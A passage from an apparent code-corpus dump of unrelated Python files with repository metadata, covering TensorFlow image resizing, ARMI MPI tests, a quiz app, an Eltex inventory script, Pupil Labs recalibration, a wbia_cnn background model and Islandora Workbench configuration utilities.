max_dimension=keep_aspect_ratio_config.max_dimension,
method=method,
pad_to_max_dimension=keep_aspect_ratio_config.pad_to_max_dimension,
per_channel_pad_value=per_channel_pad_value)
if not keep_aspect_ratio_config.convert_to_grayscale:
return image_resizer_fn
elif image_resizer_oneof == 'fixed_shape_resizer':
fixed_shape_resizer_config = image_resizer_config.fixed_shape_resizer
method = _tf_resize_method(fixed_shape_resizer_config.resize_method)
image_resizer_fn = functools.partial(
preprocessor.resize_image,
new_height=fixed_shape_resizer_config.height,
new_width=fixed_shape_resizer_config.width,
method=method)
if not fixed_shape_resizer_config.convert_to_grayscale:
return image_resizer_fn
elif image_resizer_oneof == 'identity_resizer':
def image_resizer_fn(image, masks=None, **kwargs):
del kwargs
if masks is None:
return [image, tf.shape(image)]
else:
return [image, masks, tf.shape(image)]
return image_resizer_fn
elif image_resizer_oneof == 'conditional_shape_resizer':
conditional_shape_resize_config = (
image_resizer_config.conditional_shape_resizer)
method = _tf_resize_method(conditional_shape_resize_config.resize_method)
if conditional_shape_resize_config.condition == (
image_resizer_pb2.ConditionalShapeResizer.GREATER):
image_resizer_fn = functools.partial(
preprocessor.resize_to_max_dimension,
max_dimension=conditional_shape_resize_config.size_threshold,
method=method)
elif conditional_shape_resize_config.condition == (
image_resizer_pb2.ConditionalShapeResizer.SMALLER):
image_resizer_fn = functools.partial(
preprocessor.resize_to_min_dimension,
min_dimension=conditional_shape_resize_config.size_threshold,
method=method)
else:
raise ValueError(
'Invalid image resizer condition option for '
'ConditionalShapeResizer: \'%s\'.'
% conditional_shape_resize_config.condition)
if not conditional_shape_resize_config.convert_to_grayscale:
return image_resizer_fn
elif image_resizer_oneof == 'pad_to_multiple_resizer':
pad_to_multiple_resizer_config = (
image_resizer_config.pad_to_multiple_resizer)
if pad_to_multiple_resizer_config.multiple < 0:
raise ValueError('`multiple` for pad_to_multiple_resizer should be > 0.')
else:
image_resizer_fn = functools.partial(
preprocessor.resize_pad_to_multiple,
multiple=pad_to_multiple_resizer_config.multiple)
if not pad_to_multiple_resizer_config.convert_to_grayscale:
return image_resizer_fn
else:
raise ValueError(
'Invalid image resizer option: \'%s\'.' % image_resizer_oneof)
def grayscale_image_resizer(image, masks=None):
"""Convert to grayscale before applying image_resizer_fn.
Args:
image: A 3D tensor of shape [height, width, 3]
masks: (optional) rank 3 float32 tensor with shape [num_instances, height,
width] containing instance masks.
Returns:
Note that the position of the resized_image_shape changes based on whether
masks are present.
resized_image: A 3D tensor of shape [new_height, new_width, 1],
where the image has been resized (with bilinear interpolation) so that
min(new_height, new_width) == min_dimension or
max(new_height, new_width) == max_dimension.
resized_masks: If masks is not None, also outputs masks. A 3D tensor of
shape [num_instances, new_height, new_width].
resized_image_shape: A 1D tensor of shape [3] containing shape of the
resized image.
"""
# image_resizer_fn returns [resized_image, resized_image_shape] if
# mask==None, otherwise it returns
# [resized_image, resized_mask, resized_image_shape]. In either case, we
# only deal with first and last element of the returned list.
retval = image_resizer_fn(image, masks)
resized_image = retval[0]
resized_image_shape = retval[-1]
retval[0] = preprocessor.rgb_to_gray(resized_image)
retval[-1] = tf.concat([resized_image_shape[:-1], [1]], 0)
return retval
return functools.partial(grayscale_image_resizer)
| 41.037234
| 80
| 0.735839
|
794af79dde66fe9fd5d5c968f0c767073d4014a9
| 11,265
|
py
|
Python
|
armi/tests/test_mpiFeatures.py
|
albeanth/armi
|
3755ffd2fcd1f7b6c557ef3e3f36126706a84c70
|
[
"Apache-2.0"
] | null | null | null |
armi/tests/test_mpiFeatures.py
|
albeanth/armi
|
3755ffd2fcd1f7b6c557ef3e3f36126706a84c70
|
[
"Apache-2.0"
] | null | null | null |
armi/tests/test_mpiFeatures.py
|
albeanth/armi
|
3755ffd2fcd1f7b6c557ef3e3f36126706a84c70
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for featurest that need MPI, and thus require special testing.
These tests will be generally ignored by pytest if you are trying to run
them in an environment without MPI installed.
To run these tests from the commandline, install MPI, mpi4py, and do:
mpiexec -n 2 python -m pytest armi/tests/test_mpiFeatures.py
or
mpiexec.exe -n 2 python -m pytest armi/tests/test_mpiFeatures.py
"""
# pylint: disable=abstract-method,no-self-use,unused-argument
from distutils.spawn import find_executable
import os
import unittest
from armi import context
from armi import mpiActions
from armi import settings
from armi.interfaces import Interface
from armi.mpiActions import DistributeStateAction
from armi.operators import OperatorMPI
from armi.reactor import blueprints
from armi.reactor import reactors
from armi.reactor.parameters import parameterDefinitions
from armi.reactor.tests import test_reactors
from armi.tests import ARMI_RUN_PATH, TEST_ROOT
from armi.utils import pathTools
from armi.utils.directoryChangers import TemporaryDirectoryChanger
# determine if this is a parallel run, and MPI is installed
MPI_EXE = None
if find_executable("mpiexec.exe") is not None:
MPI_EXE = "mpiexec.exe"
elif find_executable("mpiexec") is not None:
MPI_EXE = "mpiexec"
class FailingInterface1(Interface):
"""utility classes to make sure the logging system fails properly"""
name = "failer"
def interactEveryNode(self, cycle, node):
raise RuntimeError("Failing interface failure")
class FailingInterface2(Interface):
"""utility class to make sure the logging system fails properly"""
name = "failer"
def interactEveryNode(self, cycle, node):
raise RuntimeError("Failing interface critical failure")
class FailingInterface3(Interface):
"""fails on worker operate"""
name = "failer"
def fail(self):
raise RuntimeError("Failing interface critical worker failure")
def interactEveryNode(self, c, n): # pylint:disable=unused-argument
context.MPI_COMM.bcast("fail", root=0)
def workerOperate(self, cmd):
if cmd == "fail":
self.fail()
return True
return False
class MpiOperatorTests(unittest.TestCase):
"""Testing the MPI parallelization operator"""
def setUp(self):
self.old_op, self.r = test_reactors.loadTestReactor(TEST_ROOT)
self.o = OperatorMPI(cs=self.old_op.cs)
self.o.r = self.r
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_basicOperatorMPI(self):
self.o.operate()
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_masterException(self):
self.o.removeAllInterfaces()
failer = FailingInterface1(self.o.r, self.o.cs)
self.o.addInterface(failer)
if context.MPI_RANK == 0:
self.assertRaises(RuntimeError, self.o.operate)
else:
self.o.operate()
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_masterCritical(self):
self.o.removeAllInterfaces()
failer = FailingInterface2(self.o.r, self.o.cs)
self.o.addInterface(failer)
if context.MPI_RANK == 0:
self.assertRaises(Exception, self.o.operate)
else:
self.o.operate()
# these two must be defined up here so that they can be pickled
class BcastAction1(mpiActions.MpiAction):
def invokeHook(self):
nItems = 50
results = [None] * nItems
for objIndex in range(nItems):
if objIndex % context.MPI_SIZE == context.MPI_RANK:
results[objIndex] = objIndex
allResults = self.gather(results)
if allResults:
# this is confounding!!!!
return [allResults[ai % context.MPI_SIZE][ai] for ai in range(nItems)]
class BcastAction2(mpiActions.MpiAction):
def invokeHook(self):
results = []
for num in self.mpiIter(range(50)):
results.append(num)
allResults = self.gather(results)
if allResults:
return self.mpiFlatten(allResults)
class MpiDistributeStateTests(unittest.TestCase):
def setUp(self):
self.cs = settings.Settings(fName=ARMI_RUN_PATH)
bp = blueprints.loadFromCs(self.cs)
settings.setMasterCs(self.cs)
self.o = OperatorMPI(self.cs)
self.o.r = reactors.factory(self.cs, bp)
self.action = DistributeStateAction()
self.action.o = self.o
self.action.r = self.o.r
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_distributeSettings(self):
"""Under normal circumstances, we would not test "private" methods;
however, distributeState is quite complicated.
"""
self.action._distributeSettings()
if context.MPI_RANK == 0:
self.assertEqual(self.cs, self.action.o.cs)
else:
self.assertNotEqual(self.cs, self.action.o.cs)
original = {ss.name: ss.value for ss in self.cs.values()}
current = {ss.name: ss.value for ss in self.action.o.cs.values()}
# remove values that are *expected to be* different...
# crossSectionControl is removed because unittest is being mean about
# comparing dicts...
for key in ["stationaryBlocks", "verbosity", "crossSectionControl"]:
if key in original:
del original[key]
if key in current:
del current[key]
for key in original.keys():
self.assertEqual(original[key], current[key])
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_distributeReactor(self):
"""Under normal circumstances, we would not test "private" methods;
however, distributeState is quite complicated.
"""
original_reactor = self.action.r
self.action._distributeReactor(self.cs)
if context.MPI_RANK == 0:
self.assertEqual(original_reactor, self.action.r)
else:
self.assertNotEqual(original_reactor, self.action.r)
self.assertIsNone(self.action.r.core.lib)
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_distributeInterfaces(self):
"""Under normal circumstances, we would not test "private" methods;
however, distributeState is quite complicated.
"""
original_interfaces = self.o.interfaces
self.action._distributeInterfaces()
if context.MPI_RANK == 0:
self.assertEqual(original_interfaces, self.o.interfaces)
else:
self.assertEqual(original_interfaces, self.o.interfaces)
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_distributeState(self):
original_reactor = self.o.r
original_lib = self.o.r.core.lib
original_interfaces = self.o.interfaces
original_bolassems = self.o.r.blueprints.assemblies
self.action.invokeHook()
if context.MPI_RANK == 0:
self.assertEqual(self.cs, self.o.cs)
self.assertEqual(original_reactor, self.o.r)
self.assertEqual(original_interfaces, self.o.interfaces)
self.assertDictEqual(original_bolassems, self.o.r.blueprints.assemblies)
self.assertEqual(original_lib, self.o.r.core.lib)
else:
self.assertNotEqual(self.cs, self.o.cs)
self.assertNotEqual(original_reactor, self.o.r)
self.assertNotEqual(original_bolassems, self.o.r.blueprints.assemblies)
self.assertEqual(original_interfaces, self.o.interfaces)
self.assertEqual(original_lib, self.o.r.core.lib)
for pDef in parameterDefinitions.ALL_DEFINITIONS:
self.assertFalse(
pDef.assigned & parameterDefinitions.SINCE_LAST_DISTRIBUTE_STATE
)
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_compileResults(self):
action1 = BcastAction1()
context.MPI_COMM.bcast(action1)
results1 = action1.invoke(None, None, None)
action2 = BcastAction2()
context.MPI_COMM.bcast(action2)
results2 = action2.invoke(None, None, None)
self.assertEqual(results1, results2)
class MpiPathToolsTests(unittest.TestCase):
@unittest.skipIf(context.MPI_SIZE <= 1 or MPI_EXE is None, "Parallel test only")
def test_cleanPathMpi(self):
# """Simple tests of cleanPath(), in the MPI scenario"""
with TemporaryDirectoryChanger():
# TEST 0: File is not safe to delete, due to name pathing
filePath0 = "test0_cleanPathNoMpi"
open(filePath0, "w").write("something")
self.assertTrue(os.path.exists(filePath0))
with self.assertRaises(Exception):
pathTools.cleanPath(filePath0, mpiRank=context.MPI_RANK)
# TEST 1: Delete a single file
filePath1 = "test1_cleanPathNoMpi_mongoose"
open(filePath1, "w").write("something")
self.assertTrue(os.path.exists(filePath1))
pathTools.cleanPath(filePath1, mpiRank=context.MPI_RANK)
self.assertFalse(os.path.exists(filePath1))
# TEST 2: Delete an empty directory
dir2 = "mongoose"
os.mkdir(dir2)
self.assertTrue(os.path.exists(dir2))
pathTools.cleanPath(dir2, mpiRank=context.MPI_RANK)
self.assertFalse(os.path.exists(dir2))
# TEST 3: Delete a directory with two files inside
# create directory
dir3 = "mongoose"
os.mkdir(dir3)
# throw in a couple of simple text files
open(os.path.join(dir3, "file1.txt"), "w").write("something1")
open(os.path.join(dir3, "file2.txt"), "w").write("something2")
# delete the directory and test
self.assertTrue(os.path.exists(dir3))
self.assertTrue(os.path.exists(os.path.join(dir3, "file1.txt")))
self.assertTrue(os.path.exists(os.path.join(dir3, "file2.txt")))
pathTools.cleanPath(dir3, mpiRank=context.MPI_RANK)
self.assertFalse(os.path.exists(dir3))
if __name__ == "__main__":
# these tests must be run from the command line using MPI:
#
# mpiexec -n 2 python -m pytest armi/tests/test_mpiFeatures.py
# or
# mpiexec.exe -n 2 python -m pytest armi/tests/test_mpiFeatures.py
pass
| 37.178218
| 84
| 0.663826
|
794af7f9a08a43e569f28436735af484f5d91926
| 1,341
|
py
|
Python
|
main.py
|
Mackan444/Quiz-app
|
ea57daea0bdca1f4b10b970874aa250cc4664056
|
[
"MIT"
] | null | null | null |
main.py
|
Mackan444/Quiz-app
|
ea57daea0bdca1f4b10b970874aa250cc4664056
|
[
"MIT"
] | null | null | null |
main.py
|
Mackan444/Quiz-app
|
ea57daea0bdca1f4b10b970874aa250cc4664056
|
[
"MIT"
] | null | null | null |
# Marcus Lycke
# Teinf-20
# Quiz
# 16-03-2022
from Quiz_questions import question_data
from Quiz import Question
from Quiz import Quiz
#Classes
question_bank = []
for q in question_data:
question_text = q["question"]
question_answer = q["answer"]
new_question = Question(question_text, question_answer)
question_bank.append(new_question)
quiz = Quiz(question_bank)
while quiz.remaining_questions():
quiz.next_question()
print("Game Over. Well played!")
print(f"Your final score was: {quiz.score}/{quiz.question_number}\n")
"""
║ ║ ║
║║ ║║ ║
║ ║ ║ ║
║ ║.╚════
"""
"""
from secrets import choice
from Resources import Questions, Quiz
def main():
question_bank = []
question1 = Questions("Who is tallest in the class/Tim/Tim, Jesper, Marcus, Oliver")
question2 = Questions("")
question3 = Questions("")
question4 = Questions("")
question5 = Questions("")
question_bank.append(question1)
question_bank.append(question2)
question_bank.append(question3)
question_bank.append(question4)
question_bank.append(question5)
quiz = Quiz("The Quiz", question_bank, 0)
print(f"Welcome to {quiz.get_name()}\n")
while len(question_bank) != 0:
current_question = choice(question_bank)
print(current_question.get_question)
"""
| 20.953125
| 88
| 0.677107
|
794af8f3bd58327853b7178ec3e5aef2eab044aa
| 2,282
|
py
|
Python
|
sa/profiles/Eltex/LTP/get_inventory.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | null | null | null |
sa/profiles/Eltex/LTP/get_inventory.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | null | null | null |
sa/profiles/Eltex/LTP/get_inventory.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Eltex.LTP.get_inventory
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinventory import IGetInventory
class Script(BaseScript):
name = "Eltex.LTP.get_inventory"
interface = IGetInventory
cache = True
rx_platform = re.compile(
r"^\s*TYPE:\s+(?P<part_no>\S+)\s*\n"
r"^\s*HW_revision:\s+(?P<revision>\S+)\s*\n"
r"^\s*SN:\s+(?P<serial>\S+)",
re.MULTILINE,
)
rx_pwr = re.compile(r"^\s*Module (?P<num>\d+): (?P<part_no>PM\S+)", re.MULTILINE)
def execute_snmp(self, **kwargs):
v = self.scripts.get_version()
r = [{"type": "CHASSIS", "vendor": "ELTEX", "part_no": v["platform"]}]
if "attributes" in v:
r[-1]["serial"] = v["attributes"]["Serial Number"]
r[-1]["revision"] = v["attributes"]["HW version"]
pwr_num = self.snmp.get("1.3.6.1.4.1.35265.1.22.1.17.1.2.1")
pwr_pn = self.snmp.get("1.3.6.1.4.1.35265.1.22.1.17.1.3.1")
pwr_pn = pwr_pn.split()[0]
r += [{"type": "PWR", "vendor": "ELTEX", "part_no": pwr_pn, "number": pwr_num}]
return r
def execute_cli(self, **kwargs):
try:
v = self.cli("show system environment", cached=True)
except self.CLISyntaxError:
raise NotImplementedError
match = self.rx_platform.search(v)
r = [
{
"type": "CHASSIS",
"vendor": "ELTEX",
"part_no": match.group("part_no"),
"serial": match.group("serial"),
"revision": match.group("revision"),
}
]
for match in self.rx_pwr.finditer(v):
r += [
{
"type": "PWR",
"vendor": "ELTEX",
"part_no": match.group("part_no"),
"number": match.group("num"),
}
]
return r
| 33.072464
| 87
| 0.463628
|
794af8ffb664dc856d1e768575d69406960af2c7
| 4,639
|
py
|
Python
|
code/functions/pl_recalib.py
|
behinger/etcomp
|
f30389da49c3416c7a723d44951d197d6e89d40e
|
[
"MIT"
] | 20
|
2018-08-08T07:08:46.000Z
|
2022-03-07T14:49:06.000Z
|
code/functions/pl_recalib.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 32
|
2017-12-05T14:05:48.000Z
|
2020-10-20T10:29:43.000Z
|
code/functions/pl_recalib.py
|
Tsehao/etcomp
|
69485f751649090f3df589e40fb515e874be207b
|
[
"MIT"
] | 7
|
2018-12-09T22:53:10.000Z
|
2021-11-10T09:13:04.000Z
|
# -*- coding: utf-8 -*-
import numpy as np
# Pretty serious workaround. Ignores errors in imports :S
import builtins
from types import ModuleType
import logging
logger = logging.getLogger(__name__)
class DummyModule(ModuleType):
def __getattr__(self, key):
return None
__all__ = [] # support wildcard imports
def tryimport(name, *args, **kwargs):
try:
imp = realimport(name, *args,**kwargs)
#print('success: '+name)
return imp
except Exception as e:
print('reached exception:' + name)
if name =='cPickle': # because how they import cPickle/Pickle
return realimport('pickle', *args,**kwargs)
#print(e)
return DummyModule(name)
realimport, builtins.__import__ = builtins.__import__, tryimport
try:
from lib.pupil.pupil_src.shared_modules.calibration_routines.finish_calibration import finish_calibration,select_calibration_method
from lib.pupil.pupil_src.shared_modules.gaze_producers import calibrate_and_map
import lib.pupil.pupil_src.shared_modules.player_methods
except Exception as e:
print('-------------------')
print(e)
pass
tryimport, builtins.__import__ = builtins.__import__, realimport
#raise
class global_container():
pass
def list_to_stream(gaze_list):
import msgpack
gaze_serialized = [msgpack.packb(gaze, use_bin_type=True) for gaze in gaze_list]
return(gaze_serialized)
def notify_all(self,notification=''):
logger.info(notification)
def gen_fakepool(inp_gaze=[],calibration_mode='2d'):
from lib.pupil.pupil_src.shared_modules.plugin import Plugin_List
fake_gpool = global_container()
fake_gpool.capture =global_container()
fake_gpool.capture.frame_size=(1280,960)
fake_gpool.window_size =(1280,960)
fake_gpool.min_calibration_confidence = 0.6
fake_gpool.gaze_positions_by_frame = inp_gaze
fake_gpool.app = 'not-capture'
fake_gpool.user_dir = '/work'
fake_gpool.rec_dir = '/work'
fake_gpool.detection_mapping_mode = calibration_mode
fake_gpool.plugin_by_name = ''
fake_gpool.plugins = Plugin_List(fake_gpool,[])
fake_gpool.plugins.clean = lambda: None
fake_gpool.active_calibration_plugin = global_container()
fake_gpool.active_calibration_plugin.notify_all = notify_all
fake_gpool.get_timestamp = lambda: None
return(fake_gpool)
def pl_recalibV2(pupil_list,ref_list,inp_gaze,calibration_mode='2d',eyeID=None): # eye could be 0 or 1
if calibration_mode == '3d':
from lib.pupil.pupil_src.shared_modules.calibration_routines.optimization_calibration import bundle_adjust_calibration #we magically need this for libceres to work
#from calibration_routines.gaze_mappers import Binocular_Vector_Gaze_Mapper
#from calibration_routines.gaze_mappers import Monocular_Gaze_Mapper
#from calibration_routines.gaze_mappers import Vector_Gaze_Mapper
import copy
import sys
pupil = copy.copy(pupil_list)
ref = copy.copy(ref_list)
gaze = copy.copy(inp_gaze)
# to check pupil labs version
if hasattr(lib.pupil.pupil_src.shared_modules.player_methods, 'Bisector'):
# pupillab v1.8 or newer needs the data serialized
pupil = list_to_stream(pupil)
gaze = list_to_stream(gaze)
if eyeID is not None: #remove everthing nonspecified
pupil = [p for p in pupil if p['id']==eyeID]
fake_gpool = gen_fakepool(gaze,calibration_mode)
#method, result = select_calibration_method(fake_gpool, pupil_list, ref_list)
logger.info(calibrate_and_map)
calib_generator = calibrate_and_map(fake_gpool,ref,pupil,gaze,0,0)
tmp = next(calib_generator) # start once
output = []
try:
i = 0
while True:
i += 1
newsamp = next(calib_generator)
if newsamp[0] == 'Mapping complete.':
logger.info('Mapping complete')
break
if i%100000 == 1:
logger.info(newsamp[0])
try:
output.append(newsamp[1][0])
except Exception as e:
print(newsamp)
except StopIteration:
logger.error('error')
pass
calib_generator.close()
return(output)
| 32.900709
| 175
| 0.639577
|
794afae89f7158603c786fc473c9f1604778cba0
| 8,703
|
py
|
Python
|
wbia_cnn/models/background.py
|
WildMeOrg/wbia-plugin-cnn
|
c31ff09e77b731be4dffc348a1c40303e8c05994
|
[
"Apache-2.0"
] | null | null | null |
wbia_cnn/models/background.py
|
WildMeOrg/wbia-plugin-cnn
|
c31ff09e77b731be4dffc348a1c40303e8c05994
|
[
"Apache-2.0"
] | null | null | null |
wbia_cnn/models/background.py
|
WildMeOrg/wbia-plugin-cnn
|
c31ff09e77b731be4dffc348a1c40303e8c05994
|
[
"Apache-2.0"
] | 1
|
2021-05-27T15:33:26.000Z
|
2021-05-27T15:33:26.000Z
|
# -*- coding: utf-8 -*-
import logging
import functools
import six
import numpy as np
import utool as ut
from wbia_cnn import ingest_data
import lasagne
from lasagne import layers, nonlinearities
from theano import tensor as T # NOQA
from wbia_cnn.models import abstract_models
print, rrr, profile = ut.inject2(__name__)
logger = logging.getLogger()
class NonlinearityLayerSpatial(lasagne.layers.NonlinearityLayer):
def __init__(self, incoming, nonlinearity=nonlinearities.rectify, **kwargs):
"""The spatial version of a nonlinearity as applied accross all spatial
dimensions of a network's output.
"""
super(NonlinearityLayerSpatial, self).__init__(incoming, **kwargs)
self.nonlinearity = (
nonlinearities.identity if nonlinearity is None else nonlinearity
)
in_batch, in_channels, in_width, in_height = self.input_shape
self.reshape_required = in_width == 1 and in_height == 1
def get_output_for(self, input, **kwargs):
old_shape = T.shape(input)
if self.reshape_required:
input = T.reshape(input, (-1, old_shape[1]))
return self.nonlinearity(input)
elif input.ndim == 4:
input = input.dimshuffle((0, 3, 2, 1))
temp = T.shape(input)
input = T.reshape(input, (-1, old_shape[1]))
activation = self.nonlinearity(input)
activation = T.reshape(activation, temp)
activation = activation.dimshuffle((0, 3, 2, 1)) # Transpose
return activation
else:
_super = super(NonlinearityLayerSpatial, self)
return _super.get_output_for(input, **kwargs)
def get_output_shape_for(self, input_shape):
if self.reshape_required:
return input_shape[:2]
else:
_super = super(NonlinearityLayerSpatial, self)
return _super.get_output_shape_for(input_shape)
@six.add_metaclass(ut.ReloadingMetaclass)
class BackgroundModel(abstract_models.AbstractCategoricalModel):
def __init__(
model,
autoinit=False,
batch_size=128,
data_shape=(48, 48, 3),
num_output=2,
**kwargs
):
model.num_output = num_output
super(BackgroundModel, model).__init__(
batch_size=batch_size, data_shape=data_shape, name='background', **kwargs
)
def learning_rate_update(model, x):
return x / 2.0
def learning_rate_shock(model, x):
return x * 2.0
def augment(model, Xb, yb=None):
import random
import cv2
for index, X in enumerate(Xb):
if random.uniform(0.0, 1.0) <= 0.5:
Xb[index] = cv2.flip(X, 1)
return Xb, yb
def get_background_def(model, verbose=ut.VERBOSE, **kwargs):
_P = functools.partial
hidden_initkw = {
'nonlinearity': nonlinearities.LeakyRectify(leakiness=(1.0 / 10.0))
}
from wbia_cnn import custom_layers
Conv2DLayer = custom_layers.Conv2DLayer
MaxPool2DLayer = custom_layers.MaxPool2DLayer
# DenseLayer = layers.DenseLayer
network_layers_def = [
_P(layers.InputLayer, shape=model.input_shape),
_P(
Conv2DLayer,
num_filters=16,
filter_size=(11, 11),
name='C0',
**hidden_initkw
),
_P(layers.DropoutLayer, p=0.1, name='D0'),
_P(MaxPool2DLayer, pool_size=(2, 2), stride=(2, 2), name='P0'),
_P(
Conv2DLayer,
num_filters=32,
filter_size=(5, 5),
name='C1',
**hidden_initkw
),
_P(layers.DropoutLayer, p=0.2, name='D1'),
_P(MaxPool2DLayer, pool_size=(2, 2), stride=(2, 2), name='P1'),
_P(
Conv2DLayer,
num_filters=64,
filter_size=(3, 3),
name='C2',
**hidden_initkw
),
_P(layers.DropoutLayer, p=0.3, name='D2'),
_P(MaxPool2DLayer, pool_size=(2, 2), stride=(2, 2), name='P2'),
_P(
Conv2DLayer,
num_filters=128,
filter_size=(3, 3),
name='C4',
**hidden_initkw
),
_P(layers.DropoutLayer, p=0.4, name='D4'),
_P(layers.NINLayer, num_units=model.num_output, name='F3', nonlinearity=None),
_P(NonlinearityLayerSpatial, name='S0', nonlinearity=nonlinearities.softmax),
]
return network_layers_def
def init_arch(model, verbose=ut.VERBOSE, **kwargs):
r""""""
(_, input_channels, input_width, input_height) = model.input_shape
if verbose:
logger.info('[model] Initialize background model architecture')
logger.info('[model] * batch_size = %r' % (model.batch_size,))
logger.info('[model] * input_width = %r' % (input_width,))
logger.info('[model] * input_height = %r' % (input_height,))
logger.info('[model] * input_channels = %r' % (input_channels,))
logger.info('[model] * output_dims = %r' % (model.output_dims,))
network_layers_def = model.get_background_def(verbose=verbose, **kwargs)
# connect and record layers
from wbia_cnn import custom_layers
network_layers = custom_layers.evaluate_layer_list(
network_layers_def, verbose=verbose
)
# model.network_layers = network_layers
output_layer = network_layers[-1]
model.output_layer = output_layer
return output_layer
def train_background(output_path, data_fpath, labels_fpath):
r"""
CommandLine:
python -m wbia_cnn.train --test-train_background
Example:
>>> # DISABLE_DOCTEST
>>> from wbia_cnn.models.background import * # NOQA
>>> result = train_background()
>>> print(result)
"""
era_size = 8
max_epochs = 128
hyperparams = ut.argparse_dict(
{
'era_size': era_size,
'era_clean': True,
'batch_size': 128,
'learning_rate': 0.01,
'momentum': 0.9,
'weight_decay': 0.0005,
'augment_on': True,
'whiten_on': True,
'max_epochs': max_epochs,
}
)
ut.colorprint('[netrun] Ensuring Dataset', 'yellow')
dataset = ingest_data.get_numpy_dataset2(
'background', data_fpath, labels_fpath, output_path
)
logger.info('dataset.training_dpath = %r' % (dataset.training_dpath,))
ut.colorprint('[netrun] Architecture Specification', 'yellow')
model = BackgroundModel(
data_shape=dataset.data_shape,
training_dpath=dataset.training_dpath,
**hyperparams
)
ut.colorprint('[netrun] Initialize archchitecture', 'yellow')
model.init_arch()
ut.colorprint('[netrun] * Initializing new weights', 'lightgray')
if model.has_saved_state():
model.load_model_state()
else:
model.reinit_weights()
# ut.colorprint('[netrun] Need to initialize training state', 'yellow')
# X_train, y_train = dataset.subset('train')
# model.ensure_data_params(X_train, y_train)
ut.colorprint('[netrun] Training Requested', 'yellow')
# parse training arguments
config = ut.argparse_dict(
dict(
era_size=era_size,
max_epochs=max_epochs,
show_confusion=False,
)
)
model.monitor_config.update(**config)
X_train, y_train = dataset.subset('train')
X_valid, y_valid = dataset.subset('valid')
ut.colorprint('[netrun] Init encoder and convert labels', 'yellow')
if hasattr(model, 'init_encoder'):
model.init_encoder(y_train)
if getattr(model, 'encoder', None) is not None:
class_list = list(model.encoder.classes_)
y_train = np.array([class_list.index(_) for _ in y_train])
y_valid = np.array([class_list.index(_) for _ in y_valid])
ut.colorprint('[netrun] Begin training', 'yellow')
model.fit(X_train, y_train, X_valid=X_valid, y_valid=y_valid)
model_path = model.save_model_state()
return model_path
if __name__ == '__main__':
"""
CommandLine:
python -m wbia_cnn.models.background
python -m wbia_cnn.models.background --allexamples
python -m wbia_cnn.models.background --allexamples --noface --nosrc
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
| 33.732558
| 90
| 0.600712
|
794afb6f3d50f01a6fc7fc77c4171bda43ba0fe8
| 136,212
|
py
|
Python
|
workbench_utils.py
|
DonRichards/islandora_workbench
|
292a9f72a62eecad31217c4eae1115323e7f3d8a
|
[
"Unlicense"
] | null | null | null |
workbench_utils.py
|
DonRichards/islandora_workbench
|
292a9f72a62eecad31217c4eae1115323e7f3d8a
|
[
"Unlicense"
] | null | null | null |
workbench_utils.py
|
DonRichards/islandora_workbench
|
292a9f72a62eecad31217c4eae1115323e7f3d8a
|
[
"Unlicense"
] | null | null | null |
import os
import sys
import json
import csv
import openpyxl
import time
import string
import re
import copy
import logging
import datetime
import requests
import subprocess
import hashlib
import mimetypes
import collections
import urllib.parse
import magic
from pathlib import Path
from ruamel.yaml import YAML, YAMLError
from functools import lru_cache
import shutil
yaml = YAML()
def set_config_defaults(args):
"""Convert the YAML configuration data into an array for easy use.
Also set some sensible default config values.
"""
# Check existence of configuration file.
if not os.path.exists(args.config):
# Since the main logger gets its log file location from this file, we
# need to define a local logger to write to the default log file location,
# 'workbench.log'.
logging.basicConfig(
filename='workbench.log',
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S')
message = 'Error: Configuration file "' + args.config + '" not found.'
logging.error(message)
sys.exit(message)
try:
with open(args.config, 'r') as f:
config_file_contents = f.read()
original_config_data = yaml.load(config_file_contents)
# Convert all keys to lower case.
config_data = collections.OrderedDict()
for k, v in original_config_data.items():
if isinstance(k, str):
k = k.lower()
config_data[k] = v
except YAMLError as e:
# Since the main logger gets its log file location from this file, we
# need to define a local logger to write to the default log file location,
# 'workbench.log'.
logging.basicConfig(
filename='workbench.log',
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S')
message = 'Error: There appears to be a YAML syntax error with the configuration file "' + args.config + '". ' \
'\nIf you use an online YAML validator to find the error, *be sure to remove your Drupal hostname and user credentials first.*'
logging.exception(message)
sys.exit(message + "\n" + str(e))
config = {}
for k, v in config_data.items():
config[k] = v
# Set up defaults for some settings.
if 'input_dir' not in config:
config['input_dir'] = 'input_data'
if 'input_csv' not in config:
config['input_csv'] = 'metadata.csv'
if 'media_use_tid' not in config:
config['media_use_tid'] = 'http://pcdm.org/use#OriginalFile'
